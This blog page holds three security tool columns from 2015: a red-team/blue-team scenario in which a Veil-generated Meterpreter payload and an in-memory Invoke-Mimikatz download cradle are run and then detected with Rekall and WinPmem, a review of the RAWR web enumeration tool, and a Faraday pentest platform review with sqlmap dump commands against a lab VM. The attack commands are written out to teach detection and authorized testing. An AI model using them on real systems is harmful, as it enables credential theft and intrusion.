Friday, May 01, 2015

toolsmith: Attack & Detection: Hunting in-memory adversaries with Rekall and WinPmem

Prerequisites
Any Python-enabled system if running from source
A standalone Windows executable with all dependencies included is also available

Introduction

This month represents our annual infosec tools edition, and I’ve got a full scenario queued up for you. We’re running with a vignette based in absolute reality. When your organization is attacked (you already have been) and a compromise occurs (assume it will), it may well follow a script (pun intended) something like this. The most important lesson to be learned here is how to assess attacks of this nature, recognizing that little or none of the following activity will occur on the file system, instead running in memory. When we covered Volatility in September 2011, we invited readers to embrace memory analysis as an absolutely critical capability for incident responders and forensic analysts. This month, in a similar vein, we’ll explore Rekall. The project’s point man, Michael Cohen, branched Volatility (the scudette branch) in December 2011 as a Technology Preview. In December 2013 it was forked completely and became Rekall, to allow inclusion in GRR as well as methods for memory acquisition, and to advance the state of the art in memory analysis. The 2nd of April, 2015, saw the release of Rekall 1.3.1 Dammastock, named for Dammastock Mountain in the Swiss Alps. An update release, 1.3.2, was posted to Github 26 APR 2015.
Michael provided personal insight into his process and philosophy, which I’ll share verbatim in part here:
For me memory analysis is such an exciting field. As a field it is wedged between so many other disciplines - such as reverse engineering, operating systems, data structures and algorithms. Rekall as a framework requires expertise in all these fields and more. It is exciting for me to put memory analysis to use in new ways. When we first started experimenting with live analysis I was surprised how reliable and stable this was. No need to take and manage large memory images all the time. The best part was that we could just run remote analysis for triage using a tool like GRR - so now we could run the analysis not on one machine at the time but several thousand at a time! Then, when we added virtual machine introspection support we could run memory analysis on the VM guest from outside without any special support in the hypervisor - and it just worked!
While we won’t cover GRR here, recognize that the ability to conduct live memory analysis across thousands of machines, physical or virtual, without impacting stability on target systems is a massive boon for datacenter and cloud operators.

Scenario Overview

We start with the assertion that the red team’s attack graph is the blue team’s kill chain.
Per Captain Obvious: the better defenders (blue team) understand attacker (red team) methods, the better able they are to defend against them. Conversely, the more aware red teamers are of blue team detection and analysis tactics, the more readily they can evade them.
As we peel back this scenario, we’ll explore both sides of the fight; I’ll walk you through the entire process including attack and detection. I’ll evade and exfiltrate, then detect and define.
As you might imagine, the attack starts with a targeted phishing attack. We won’t linger here; you’ve all seen the like. The key takeaway for red and blue: the more enticing the lure, the more numerous the bites. Surveys promising rewards are particularly successful; everyone wants to “win” something, and sadly, many are willing to click and execute payloads to achieve their goal. These folks are the red team’s best friend and the blue team’s bane. Once the payload is delivered and executed for an initial foothold, the focus moves to escalation of privilege if necessary and acquisition of artifacts for pivoting and exploration of key terrain. With the right artifacts (credentials, hashes), causing effect becomes trivial, and often leads to total compromise. For this exercise, we’ll assume we’ve compromised a user who is running their system with administrative privileges, which sadly remains all too common. With some great PowerShell and the omniscient and almighty Mimikatz, the victim’s network can be your playground. I’ll show you how.

ATTACK

Keep in mind, I’m going into some detail here regarding attack methods so we can then play them back from the defender’s perspective with Rekall, WinPmem, and VolDiff.

Veil
All good phishing attacks need a great payload, and one of the best ways to ensure you deliver one is Christopher Truncer’s (@ChrisTruncer) Veil-Evasion, part of the Veil-Framework. The most important aspect of Veil use is creating payloads that evade antimalware detection. This limits attack awareness for the monitoring and incident response teams, as no initial alerts are generated. While the payload does land on the victim’s file system, it’s not likely to end up quarantined or deleted, happily delivering its expected functionality.
I installed Veil-Evasion on my Kali VM easily:
1)      apt-get install veil
2)      cd /usr/share/veil-evasion/setup
3)      ./setup.sh
Thereafter, to run Veil you need only execute veil-evasion.
Veil includes 35 payloads at present; choose list to review them.
I chose 17) powershell/meterpreter/rev_https as seen in Figure 1.

Figure 1 – Veil payload options
I ran set LHOST 192.168.177.130 for my Kali server acting as the payload handler, followed by info to confirm, and generate to create the payload. I named the payload toolsmith, which Veil saved as toolsmith.bat. If you happened to view the .bat file in a text editor you’d see nothing other than what appears to be a reasonably innocuous PowerShell script with a large Base64 string. Many a responder would potentially roll right past the file as part of normal PowerShell administration. In a real-world penetration test, this would be the payload delivered via spear phishing, ideally to personnel known to have privileged access to key terrain.
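To recap that sequence as entered at the Veil-Evasion interactive menu, here’s a sketch of the steps just described (the LHOST value and payload choice are specific to this scenario):
use powershell/meterpreter/rev_https
set LHOST 192.168.177.130
info
generate
When generate prompts for a base name, supplying toolsmith yields the toolsmith.bat payload described above.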

Metasploit
This step assumes our victim has executed our payload in a time period of our choosing. Obviously, set up your handlers before sending your phishing mail. I will not discuss persistence here for brevity’s sake, but imagine that an attacker will take steps to ensure continued access. Read Fishnet Security’s How-To: Post-Ex Persistence Scripting with PowerSploit & Veil as a great primer on these methods.
Again, on my Kali system I set up a handler for the shell access created by the Veil payload.
1)      cd /opt/metasploit/app/
2)      msfconsole
3)      use exploit/multi/handler
4)      set payload windows/meterpreter/reverse_https
5)      set lhost 192.168.177.130
6)      set lport 8443
7)      set exitonsession false
8)      exploit -j
At this point back returns you to the root msf > prompt.
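If you stand this handler up often, the same commands can be dropped into a Metasploit resource script and replayed in one shot. A minimal sketch, assuming a file named handler.rc (the file name is mine):
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.177.130
set lport 8443
set exitonsession false
exploit -j
Launch it with msfconsole -r handler.rc and the listener is ready before the phish ever lands.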
When the victim executes toolsmith.bat, the handler reacts with a Meterpreter session as seen in Figure 2.

Figure 2 – Victim Meterpreter session
Use sessions -l to list available sessions, then sessions -i 2 to interact with the session seen in Figure 2.
I now have an interactive shell on the victim system and have some options. As I’m trying to exemplify running almost entirely in victim memory, I opted not to copy additional scripts to the victim; had I done so, it would have been another PowerShell script making use of Joe Bialek’s (@JosephBialek) Invoke-Mimikatz, which leverages Benjamin Delpy’s (@gentilkiwi) Mimikatz. Instead I pulled Joe’s script down directly from Github and ran it directly in memory, leaving no file system artifacts.
From the MSF console, I first ran spool /root/meterpreter_output.txt.
Then via the Meterpreter session, I executed the following.
1) getsystem (if the user is running as admin you’ll see “got system”)
2) shell
3) powershell.exe "iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
A brief explanation here. The shell command spawns a command prompt on the victim system, and getsystem ensures that you’re running as local system (NT AUTHORITY\SYSTEM), which is important when you’re using Joe’s script to leverage Mimikatz 2.0 along with Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. Again, our goal here is to conduct activity such as dumping credentials without ever writing the Mimikatz binary to the victim file system. Our last line does so in an even craftier manner. To avoid writing output to the victim file system, I used the spool command to write all content back to a text file on my Kali system, and used PowerShell’s ability to read Joe’s script directly from Github into memory and poach credentials accordingly. Back on my Kali system, a review of /root/meterpreter_output.txt confirms the win. Figure 3 displays the results.

Figure 3 – Invoke-Mimikatz for the win!
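Broken out for readability, the download-cradle one-liner from step 3 amounts to the following (a sketch only; the variable name is mine, the URL is the same raw Github path used above):
$script = (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
iex $script
Invoke-Mimikatz -DumpCreds
The script body is fetched over HTTPS straight into memory, invoked with iex (Invoke-Expression), and only then is Invoke-Mimikatz called to dump credentials; at no point does Invoke-Mimikatz.ps1 touch the victim disk.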
If I had pivoted from this system and moved to a heavily used system such as a terminal server or an Exchange server, I may have acquired domain admin credentials as well. I’d certainly have acquired local admin credentials, and no one ever uses the same local admin credentials across multiple systems, right? ;-)
Remember, all this, with the exception of a fairly innocent looking initial payload, toolsmith.bat, took place in memory. How do we spot such behavior and defend against it? Time for Rekall and WinPmem, because they “can remember it for you wholesale!”

DEFENSE

Rekall preparation

Installing Rekall on Windows is as easy as grabbing the installer from Github, 1.3.2 as this is written.
On x64 systems it will install to C:\Program Files\Rekall; add that directory to your PATH so you can run Rekall from anywhere.
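For the current command prompt session, something like the following does the trick (a sketch; use the System Properties dialog or setx if you want the change to persist across sessions):
set PATH=%PATH%;C:\Program Files\Rekall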

WinPmem

WinPmem 1.6.2 is the current stable version and WinPmem 2.0 Alpha is the development release. Both are included on the project Github site. Having an imager embedded with the project is a major benefit, and the project develops against it with a passion.
Running WinPmem for live response is as simple as winpmem.exe -l to load the driver; you then launch Rekall against the winpmem device with rekal -f \\.\pmem (this device name cannot be changed) for live memory analysis.
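A minimal live-response sequence therefore looks something like this (a sketch, assuming the 1.6.2 binary name used later in this article and that the -u switch unloads the driver when you’re finished):
winpmem_1.6.2.exe -l
rekal -f \\.\pmem
winpmem_1.6.2.exe -u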

Rekall use

There are a few ways to go about using Rekall. You can take a full memory image, locally with WinPmem or remotely with GRR, and bring the image back to your analysis workstation. You can also interact with memory on the victim system in real-time live response, which is what differentiates Rekall from Volatility. On the Windows 7 x64 system I compromised with the attack described above, I first ran winpmem_1.6.2.exe compromised.raw and shipped the 4GB memory image to my workstation. You can simply run rekal, which will drop you into the interactive shell. As an example I ran rekal -f D:\forensics\memoryImages\toolsmith\compromised.raw, then ran various plugins from the shell. Alternatively, I could have run rekal -f D:\forensics\memoryImages\toolsmith\compromised.raw netstat at a standard command prompt for the same results. The interactive shell is the “most powerful and flexible interface”, most importantly because it allows session management and storage specific to an image analysis.
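Pulled together, the offline workflow I used boils down to three commands (exactly as run in this scenario; only the destination path is specific to my workstation):
winpmem_1.6.2.exe compromised.raw
rekal -f D:\forensics\memoryImages\toolsmith\compromised.raw
rekal -f D:\forensics\memoryImages\toolsmith\compromised.raw netstat
The first acquires the image on the victim, the second drops you into the interactive shell against the copied image, and the third runs a single plugin non-interactively for quick answers.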

Suspicious Indicator #1
From the interactive shell I started with the netstat plugin, as I always do. Might as well see who is talking to whom, yes? We’re treated to the instant results seen in Figure 4.

Figure 4 – Rekall netstat plugin shows PowerShell with connections
Yep, sure enough we see a connection to our above-mentioned attacker at 192.168.177.130; the “owner” is attributed to powershell.exe and the PIDs are 1284 and 2396.

Suspicious Indicator #2
With the pstree plugin we can determine the parent PIDs (PPID) for the PowerShell processes. What’s odd here from a defender’s perspective is that each PowerShell process seen in the pstree (Figure 5) is spawned from cmd.exe. While not at all conclusive, it is at least intriguing.


Figure 5 – Rekall pstree plugin shows powershell.exe PPIDs
Suspicious Indicator #3
I used malfind to find hidden or injected code/DLLs and dump the results to a directory I was scanning with an AV engine. With malfind pid=1284, dump_dir="/tmp/" I received feedback on PID 1284 (repeated for 2396), with indications specific to Trojan:Win32/Swrort.A. From the MMPC write-up: “Trojan:Win32/Swrort.A is a detection for files that try to connect to a remote server. Once connected, an attacker can perform malicious routines such as downloading other files. They can be installed from a malicious site or used as payloads of exploit files. Once executed, Trojan:Win32/Swrort.A may connect to a remote server using different port numbers.” Hmm, sound familiar from the attack scenario above? ;-) Note that the netstat plugin found that powershell.exe was connecting via 8443 (a “different” port number).

Suspicious Indicator #4
To close the loop on this analysis, I used memdump for a few key reasons. This plugin dumps all addressable memory in a process, enumerates the process page tables, writes them out to an external file, and creates an index file useful for finding the related virtual addresses. I did so with memdump pid=2396, dump_dir="/tmp/", and ditto for PID 1284. You can use the .dmp output to scan for malware signatures or other patterns. One such method is a strings keyword search. Given that we are responding to what we can reasonably assert is an attack via PowerShell, a keyword-based string search is definitely in order. I used my favorite context-driven strings tool and searched for invoke against powershell.exe_2396.dmp. The results paid immediate dividends; I’ve combined two critical matches in Figure 6.

Figure 6 – Strings results for keyword search from memdump output
Suspicions confirmed, this box be owned, aargh!
The strings results on the left show the initial execution of the PowerShell payload, most notably including the Hidden attribute and the Bypass execution policy, followed by a slew of Base64 that is the powershell/meterpreter/rev_https payload. The strings results on the right show when Invoke-Mimikatz.ps1 was actually executed.
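For reference, a rough command-line equivalent of that keyword search (an assumption on my part: GNU strings plus grep rather than the context-driven tool used above):
strings powershell.exe_2396.dmp | grep -i invoke
strings -e l powershell.exe_2396.dmp | grep -i invoke
The first pass catches ASCII strings, while -e l catches the 16-bit little-endian (Unicode) strings so common in Windows process memory.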
Four quick steps with Rekall and we’ve, in essence, reversed the steps described in the attack phase.
Remember too, we could just as easily have conducted these same steps on a live victim system with the same plugins via the following:
rekal -f \\.\pmem netstat
rekal -f \\.\pmem pstree
rekal -f \\.\pmem malfind pid=1284, dump_dir="/tmp/"
rekal -f \\.\pmem memdump pid=2396, dump_dir="/tmp/"

In Conclusion

In celebration of the annual infosec tools edition, we’ve definitely gone a bit hog wild, but because this exercise has been so valuable for me, I have to imagine you’ll find this level of process and detail useful as well. Michael and team have done wonderful work with Rekall and WinPmem. I’d love to hear your feedback on your usage, particularly with regard to close, cooperative efforts between your red and blue teams. If you’re not using these tools yet, you should be, and I recommend a long, hard look at GRR as well. I’d also like to give more credit where it’s due. In addition to Michael Cohen, other tools and tactics here were developed and shared by people who deserve recognition. They include Microsoft’s Mike Fanning, root9b’s Travis Lee (@eelsivart), and Laconicly’s Billy Rios (@xssniper). Thank you for everything, gentlemen.
Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next month.

Acknowledgements

Michael Cohen, Rekall/GRR developer and project lead (@scudette)

Wednesday, April 01, 2015

toolsmith: Rapid Assessment of Web Resources (RAWR!)

In memory and honor of Leonard Nimoy (1931-2015): “Of all the souls I have encountered in my travels, his was the most... human.”

Prerequisites
Typically *nix, tested here on Ubuntu & Kali
Kali and Ubuntu recommended, virtual machine or physical

Overview

Confession, and it shouldn’t be a shocker: I’m a huge military science fiction fan. As such, John Ringo is one of my absolute favorites. I’m in the midst of his Black Tide Rising campaign, specifically Book 2, To Sail a Darkling Sea. As we contemplate this month’s ISSA Journal topic, Security Architecture/Security Management, let’s build a bit on this theme of dark seas as we look out at our probable futures. Keren Elazari (she is speaking at RSA 2015, where you may well be reading this in print), in her April 2015 Scientific American article, How To Survive Cyberwar, states that “in the coming years, cyberattacks will almost certainly intensify, and that is a problem for all of us. Now that everyone is connected in some way to cyberspace - through our phones, our laptops, our corporate networks – we are all vulnerable.” If you haven’t caught up with this perspective yet, wake up. I’m a Premera customer, you with me? Ringo starts Chapter 1 of To Sail a Darkling Sea with Sir Edmund Burke: “When bad men combine, the good must associate; else they will fall, one by one, an unpitied sacrifice in a contemptible struggle.”
You’ll therefore forgive me if I stay on a bit of a pentesting & assessment run having just covered Faraday last month, but it’s for good reason. While unable to be specific, I can tell you that, at multiple intervals in the last few months, I have seen penetration tests, and the brilliant testers executing them, provide extraordinary value for their “customers”. One way to try and avoid sailing the darkling, compromised seas of the Intarwebs is with a robust penetration testing program, as integral to security management as any governance, risk, and compliance program. Bad men combine, we know that; the good must pentest. :-)
Let’s put philosophy into action this month with Adam Byers’ RAWR (NJ Ouchn, our friend @toolswatch, is on the RAWR team too). I asked Adam for the typical tool author’s contribution to the column and was treated to such robust content that I’m going to take a slightly different approach this month, where I’ll weave in Adam’s feedback throughout as we take RAWR on a walkabout. For a proper introduction per Adam: "RAWR was designed to ease the process of the mapping, discovery, and reporting phases of an assessment with a focus primarily on web resources. It was built to be quick, scalable, and productive for the assessor. From the ground up, it accepts input from multiple different known scanning solutions, as well as leveraging NMap if no pre-existing scan data is available.  The goal of RAWR is to consolidate and capture the pieces of information that are most useful while performing a web assessment, and produce output that is normalized and functional.  There are many common checks performed in the process of a web assessment, each yielding information that is useful. The problem is that there are many different tools capable of gathering these singular bits of data, and each one produces output unlike the last. This further complicates the job that the assessor is tasked to perform, because producing a report that effectively compiles all of this information is the end goal.  With RAWR we want to take any type of relevant input, perform enumeration, and effectively pass the data on to the next phase - whether that phase be a tool, a person, or the end report itself.”
If you’ve conducted an assessment at any time, unless you’re working for one of those cookie cutter, CEH-certified checklist compliance mills, you’ve run into the issue of many different tools gathering data but generating output unlike the last. Outstanding efforts such as RAWR contribute greatly to the collaborate, combine, and complete cause, resulting in improved results and happier customers.
Adam also indicated that in addition to assessments, RAWR is useful during audits. Its ability to capture artifacts such as screenshots of disclaimer statements and login banners drastically reduces the amount of time it takes to complete audit tasks. The RAWR roadmap includes full header specification (including cookies), email/SMS notifications (already in the dev branch), better DNS functionality, and the acceptance of new input formats. The RAWR development pipeline also includes database integration for comparison and differential analysis of historical scan data via a PostgreSQL database, allowing trending as an example.
With that in mind, let’s begin our exploration.

Ready RAWR!



Some quick installation and setup notes. I initially installed RAWR on Kali but received rather buggy and incomplete results. Suspecting more of a Kali libs issue versus a RAWR shortcoming, I moved to an Ubuntu instance and received far better results.
At an Ubuntu terminal prompt, I executed:
cd rawr
sudo ./install.sh
The RAWR installer will help acquire dependencies including Ghost or phantomJS, python-lxml for parsing XML and HTML, and python-pygraphviz to create PNG diagrams from a site crawl. You’ll be asked to confirm installation of missing dependencies; on Kali nmap is native, but phantomJS, DPE (from @toolswatch), and others will need to be installed. If you end up with pygraphviz errors on Ubuntu, you may need to force installation with sudo apt-get install python-pygraphviz, then run ./install.sh -u.
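Pulled together, the Ubuntu install sequence, including the pygraphviz workaround, looks like this (a recap of the steps above; the last two lines are only needed if the errors appear):
cd rawr
sudo ./install.sh
sudo apt-get install python-pygraphviz
./install.sh -u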

Run RAWR!

Adam provided us details for a typical assessment with RAWR; we’ll follow his steps and provide results as we go along.

Adam: A typical assessment begins with performing enumeration with RAWR. Executing something like rawr -a -o -r -x -S3 --dns gives us quite a bit of information to work with.

toolsmith: I ran ./rawr.py holisticinfosec.org -p fuzzdb -a -o -r -x -S3 --ssl --dns. To use FuzzDB Common Ports, I set -p fuzzdb. The -a switch is used to include all open ports in the CSV output and the Threat Matrix. The -o switch grabs HTTP OPTIONS, -r acquires robots.txt, and -x pulls down crossdomain.xml. The -S3 flag controls crawl intensity (3 is the default), --ssl tells nmap to call enum-ciphers.nse for more in-depth SSL data, and --dns queries Bing for other hostnames and adds them to the queue. Results are written to a log directory, specifically /rawr/log_20150321-143627_rawr on my Ubuntu instance. Therein, a cornucopia of useful results abounds.
Adam: The Attack Surface (Threat) Matrix provides a quick view of ports on hosts; as well as patterns that reveal clustered services, similar host configurations, HA setups, and potential firewalls.

toolsmith: As seen in Figure 1, my Threat Matrix does not offer much to be concerned about, just 80 and 443 listening.

Figure 1 – RAWR Threat Matrix results

Adam: We can take serverinfo.csv and use it as a checklist, notating any interesting hosts and possible vulnerabilities.  Because we specified '-a' in the command line, all port data is included in the output regardless of whether or not it is web based.

toolsmith: The server information feature returns results for url, ipv4, port, returncode, hostnames, title, robots, script, file_includes, ssl_cert-daysleft, ssl_cert-validityperiod, ssl_cert-md5, ssl_cert-sha-1, ssl_cert-notbefore, ssl_cert-notafter, cpe, cve, service_version, server, endurl, date, content-type, description, author, revised, docs, passwordfields, email_addresses, html5, comments, defpass, and diagram. As seen in Figure 2, my serverinfo.csv provides a sample of such details.

Figure 2 – RAWR server information
Adam: The ‘index’ HTML report provides a dynamic (jQuery-driven) way to sift through screenshots and information captured from each host. While performing a site spider, RAWR pulls meta data from any docs found, which usually hands us a list of usernames, email addresses, domains, server names, phone numbers, and more in an HTML format, linked to in the index report. Also available via the index is a report that addresses the security headers of the target scope, alerting the assessor of improperly configured web sites and services.

toolsmith: I’ll share the results of each of the three succinct reports generated. Figure 3 represents the initial index report.

Figure 3 – RAWR Index Report
Figure 4 indicates the Nmap results.

Figure 4 – RAWR Nmap Scan Report
Figure 5 displays the security headers report. This report includes definitions from https://securityheaders.com to provide clarity.

Figure 5 – RAWR Security Headers Report
Figure 6 provides the results of the metadata extracted during the RAWR scan.

Figure 6 – RAWR Metadata Report
Adam: For web-focused testing, we also use the '--proxy' switch to push all of the traffic through Portswigger’s BurpSuite or OWASP Zed Attack Proxy.  RAWR isn't a vulnerability scanner, so it's helpful to leverage an interception proxy for further scans and session data when we go hunting.  Most IDS/IPS configurations will not alert on any of RAWR's activity aside from the initial NMap scan, as every request is a valid HTTP call to a verified host.

toolsmith: I ran RAWR separately through Burp with the --proxy switch enabled; this is a fabulous way to build an initial footprint, then proceed with more aggressive web application security testing. You can customize your RAWR scans via /rawr/conf/settings.py, including the user-agent (useful when you want to be uniquely identified during assessments), Nmap speed, CSV settings, spider aggression, and default ports.
Keep in mind, you should only be using RAWR against resources you are authorized to assess.

In Conclusion

Adam reminds us that no one tool does it all and that it would be great to see more integration and data synchronicity between different tool sets. RAWR developers seek to overcome this by facilitating its acceptance of multiple input formats, as well as outputs like JSON, CSV, ShelvDB, and the aforementioned planned PostgreSQL integration. There are also word lists for hydra and input lists for NMap, as well as other lists with Dirbuster, Nikto, and MetaSploit in mind. As information security tools developers work to build tools that are modular and scalable, so too should they consider making them compatible. Great work here by Adam and team; I really look forward to continued RAWR development and the principles it aligns with. A bright beacon in the darkling sea, if you will.
Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next month.

Acknowledgements

Adam Byers (@al14s), RAWR (@RapidWebEnum) project lead
Tom Moore (@c0ncealed)

Tuesday, March 03, 2015

toolsmith: Faraday IPE - When Tinfoil Won’t Work for Pentesting



Prerequisites
Typically *nix, tested on Debian, Ubuntu, Kali, etc.
Kali 1.1.0 recommended, virtual machine or physical


Overview
I love me some tinfoil-hat-wearing conspiracy theorists, nothing better than sparking up a lively conversation with a “Hey man, what was that helicopter doing over your house?” and you’re off to the races. Me, I just operate on the premise that everyone is out to get me and I’m good to go. For the more scientific amongst you, there’s always a Faraday option. What? You don’t have a Faraday Cage in your house? You’re going to need more tinfoil. :-)

Figure 1 – Tinfoil coupon

In all seriousness, Faraday, in the toolsmith context, is an Integrated Penetration-Test Environment (IPE); think of it as an IDE for penetration testing designed for distribution, indexation, and analysis of the data generated during the process of a security audit (pentest) conducted with multiple users. We discussed similar concepts in toolsmith some years ago: Raphael Mudge’s Armitage is a comparable idea for Metasploit, while Dradis provides information sharing for pentest teams.
Faraday now includes plugin support for over 40 tools, including some toolsmith topics and favorites such as OpenVAS, BeEF, Arachni, Skipfish, and ZAP.
The Faraday project offers a robust wiki and a number of demo videos you should watch as well.
I pinged Federico Kirschbaum, Infobyte’s CTO and project lead for Faraday.
He stated that, as learned from doing security assessments, they always had the need to know what the results were from the tests performed by other team members. Sharing partial knowledge of target systems proved to be useful not only to avoid overlapping but also to reuse discoveries and build a complete picture. During penetration tests where the scope is quite large, it is common that a vulnerability detected in one part of the network can be exploited somewhere else as well. Faraday’s purpose is to aid security professionals and its development is driven by this desire to truly convert penetration testing into a community experience.
Federico also described their goal to provide an environment where all the data generated during a pentest can be transformed into meaningful, indexed information. Results can then be easily distributed between team members in real time without the need to change workflow or tools, allowing them to benefit from the shared knowledge. Pentesters use a lot of tools on a daily basis, and everybody has a "favorite" toolset, ranging from full blown vulnerability scanners to in-house tools; instead of trying to change the way people like to work the team designed Faraday as a bridge that allows tools to work in a collaborative way. Faraday's plug-in engine currently supports more than 40 well known tools and also provides an easy-to-use API to support custom tools.
Information persisted in Faraday can be queried, filtered, and exported to feed other tools. As an example, one could extract all hosts discovered running SSH in order to perform mass brute force attacks or see which commands or tools have been executed.
Federico pointed out that Faraday wasn't built thinking only about pentesters. Project managers can also benefit from a central database containing several assessments at once while being able to easily see the progress of their teams and have the ability to export information to send status reports.
It was surprising to the Infobytes team that many of the companies that use Faraday today are pentest clients rather than the actual pentest consultant. This is further indication of why it is always useful to have a repository of penetration test results whether they be internal or through outside vendors.
Faraday comes in three flavors: Community, Professional, and Corporate. All of the features mentioned above are available in the Community version, which is Open Source. I tested Community for this effort as it is free.
Federico, in closing, pointed out that one of the main features in the commercial version is the ability to export reports for MS Word containing all the vulnerabilities, graphs, and progress status. This makes reporting, a pentester’s bane (painful, uncomfortable, unnatural even), into a one-click operation that can be executed by any team member at any time. See the product comparison page for more features and details for versions, based on your budget and needs.

Faraday preparation

The easiest way to run Faraday, in my opinion, is from Kali. This is a good time to mention that Kali 1.1.0 is available as of 9 FEB 2015; if you haven’t yet upgraded, I recommend doing so soon.
At the Kali terminal prompt, execute:
git clone https://github.com/infobyte/faraday.git faraday-dev
cd faraday-dev
./install.sh
The installer will download and install dependencies, but you’ll need to tweak CouchDB to make use of the beautiful HTML5 reporting interface. Use vim or Leafpad to edit /etc/couchdb/local.ini and uncomment (remove the semicolon from) port and bind_address on lines 11 and 12. You may want to use the Kali instance’s IP address rather than the loopback address, to allow remote connections (other users). You can also change the port to your liking. Then restart the CouchDB service with service couchdb restart. You can manipulate SSL and authentication mechanisms in local.ini as well. Now issue ./faraday.py -d. I recommend running with -d as it gives you all the debug content in the logging console. The service will start, the QT GUI will spawn, and if all goes well, you’ll receive an INFO message telling you where to point your browser for the CouchDB reporting interface. Note that there are limitations specific to reporting in the Community version as compared to its commercial peers.
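After the edit, the relevant stanza of /etc/couchdb/local.ini looks something like this (a sketch; the bind address shown is a hypothetical Kali IP and 5984 is CouchDB’s default port):
[httpd]
port = 5984
bind_address = 192.168.255.128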

Figure 2 – Initial Faraday GUI QT
Fragging with Faraday

The first thing you should do in the Faraday UI is create a workspace: Workspace | Create. Be sure to save it as CouchDB as opposed to FS. I didn’t enable replication as I worked alone for this assessment.
Shockingly, I named mine toolsmith. Explore the plugins available thereafter with either Tools | Plugin or use the Plugin button, fourth from the right on the toolbar. I started my assessment exercise against a vulnerable virtual machine (192.168.255.131) with a quick ping and nmap via the Faraday shell (Figure 3). To ensure the default visualizations for Top Services and Top Host populated in the Faraday Dashboard, I also scanned a couple of my gateways.

Figure 3 – Preliminary Faraday results
As we can see in Figure 3, our target host appears to be listening on port 80, indicating a web server and a great time to utilize a web application scanner. Some tools, such as the commercial Burpsuite Pro, have a Faraday plugin for direct integration, but you can still make use of free Burpsuite data, as well as results from the likes of the free and fabulous OWASP ZAP. To do so, conduct a scan and save the results as XML to the applicable workspace directory, ~/.faraday/report/toolsmith in my case. The results become evident when you right-click the target host in the Host Tree as seen in Figure 4.

Figure 4 – Faraday incorporates OWASP ZAP results
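As a concrete sketch of that import step (the ZAP export file name here is hypothetical; the report directory is the workspace path noted above):
cp ~/zap_toolsmith.xml ~/.faraday/report/toolsmith/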
We can see as we scroll through findings we’ve discovered a SQL injection vulnerability; no better time to use sqlmap, also supported by Faraday. Via the Faraday shell I ran the following, based on my understanding of the target apps discovered with ZAP.
To enumerate the databases:
sqlmap -u 'http://192.168.255.134/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' --dbs
To enumerate the tables present in the Joomla database:
sqlmap -u 'http://192.168.255.134/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D joomla --tables
To dump the users from the Joomla database:
sqlmap -u 'http://192.168.255.134/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' --dump  -D joomla -T j25_users
Unfortunately, late in the game as this was being written, we discovered a change in sqlmap behavior that caused some misses for the Faraday sqlmap plugin, preventing sqlmap data from being populated in the CouchDB and thus the Faraday host tree. Federico immediately noted the issue and was issuing a patch as I was writing; by the time you read this you’ll likely be working with an updated version. I love sqlmap so much though and wanted you to see the Faraday integration. Figure 5 gives you a general sense of the Faraday GUI accommodating all this sqlmap mayhem.

Figure 5 – Faraday shell and sqlmap
That being said, here’s where all the real Faraday superpowers kick in. You’ve enumerated, assessed, and even exploited; now to see some truly beautified HTML5 results. Per Figure 6, the Faraday Dashboard is one of the most attractive I’ve ever seen and includes different workspace views, hover-over functionality, and host drilldown.

Figure 6 – Faraday Dashboard
There’s also the status report view, which should speak for itself and allows really flexible filtering, as seen in Figure 7.

Figure 7 – Faraday Status
Those pentesters and pentest PMs who are looking for a data management solution should now be fully inspired to check out Faraday in its various versions and support levels. It’s an exciting tool for a critical cause.

In Conclusion

Faraday is a project that benefits from your feedback, feature suggestions, bug reports, and general support. They’re an engaged team with a uniquely specialized approach to problem solving for the red team cause, and I look forward to future releases and updates. I know more than one penetration testing team to whom I will strongly suggest Faraday consideration.
Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next month.

Acknowledgements

Federico Kirschbaum (@fede_k), Faraday (@faradaysec) project lead, CTO Infobyte LLC (@infobytesec)